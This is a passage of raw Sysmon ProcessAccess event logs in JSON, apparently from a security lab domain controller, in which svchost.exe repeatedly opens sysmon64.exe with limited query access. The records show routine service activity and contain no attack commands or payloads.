06:49:16.514","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1734,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.514\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.514","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1735,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.514\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.514","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1736,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.515\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.515","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1737,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.515\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.515","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1738,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.515\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.515","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1739,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.515\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.515","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1740,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.515\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.515","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1741,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.515\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 